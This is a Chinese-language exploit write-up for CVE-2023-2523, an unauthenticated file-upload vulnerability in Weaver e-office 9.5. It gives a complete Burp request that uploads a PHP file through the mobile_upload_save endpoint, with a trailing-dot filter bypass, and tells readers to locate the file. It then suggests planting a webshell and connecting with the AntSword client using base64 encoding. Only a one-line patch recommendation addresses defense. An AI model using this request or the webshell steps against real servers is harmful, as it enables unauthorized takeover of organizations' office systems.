声明
本文仅用于技术交流，请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。
文章作者拥有对此文章的修改和解释权。如欲转载或传播此文章，必须保证此文章的完整性，包括版权声明等全部内容。未经允许，不得任意修改或者增减此文章内容，不得以任何方式将其用于商业目的。
 

简介

泛微OA是中国领先的OA办公自动化产品商，是一套集OA、合作、工作流一体化的企业级信息化管理软件。它可以帮助企业实践现办公自动化、信息协同、决策智能化等功能，提升企业生产效率和管理水平，是企业数字化转型和数字化办公的好工具。

泛微OA提供了完整的办公自动化解决方案，包括邮件管理、日程管理、文档管理、签批审查、会议管理、考勤管理、人力资源管理等模块，支持PC端、移动端多种应用场景。同时，它还可以与各种企业管理系统（如ERP、CRM等系统）进行整合，形成完整的业务流程和信息链条。

漏洞概述

漏洞编号  cve-2023-2523

    泛微e-office 9.5版本，源文件 App/Ajax/ajax.php?action=mobile_upload_save 的一些未知功能存在问题。 参数 upload_quwan 的操作导致不受限制的上传，未经身份验证的恶意攻击者通过上传恶意文件，从而获取目标服务器的控制权限。

漏洞利用

 poc如下，复制替换burp的请求包

POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save  HTTP/1.1
Host: xxx.xxx.xxx.xxx:xxxx
Content-Length: 351
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: LOGIN_LANG=cn; PHPSESSID=a928fd476c924660715ba69920ee6788
Upgrade-Insecure-Requests: 1------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="upload_quwan"; filename="1.php."
Content-Type: image/jpeg<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--

重发一下，查看返回信息

 这里大家可以看到 ，返回包中有完整的路径，直接访问

tips：这里1.php.是为了绕过过滤条件，访问的时候不要加php后面的点

正常情况下应该是这样

 还有这种情况

盲猜应该是8080或者8088

 

 如果是漏洞环境的话，大家可以尝试放个🐎，我这里就不能给大家演示了

使用蚁剑链接时注意

tips:必须要使用base64编码 

最好的情况是使用蚁剑的编码器，之前发表的。

修复建议

升级版本，打补丁

泛微e-office体验服务中心_泛微移动办公OA系统标准版_中小组织办公数字化产品